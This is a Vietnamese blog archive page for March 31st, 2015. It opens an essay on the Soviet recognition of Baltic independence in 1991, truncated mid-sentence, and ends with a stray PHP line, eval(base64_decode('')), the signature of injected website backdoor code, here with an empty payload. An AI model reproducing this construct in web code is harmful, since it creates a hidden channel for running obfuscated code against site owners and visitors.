Archive for March 31st, 2015

Sức mạnh của niềm tin

Sức mạnh của niềm tin

Chiều thứ Sáu ngày 6 tháng 9, 1991 các báo lớn lên khắp thế giới loan tin “Moscow chính thức công nhận quyền độc lập của ba quốc gia Lithuania, Latvia và Estonia sau nửa thế kỷ kiểm soát”. Ngoại trưởng Liên Xô Boris N. Pankin tuyên bố “Ch

03.31.2015 | Tiểu Luận- Chính Luận |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>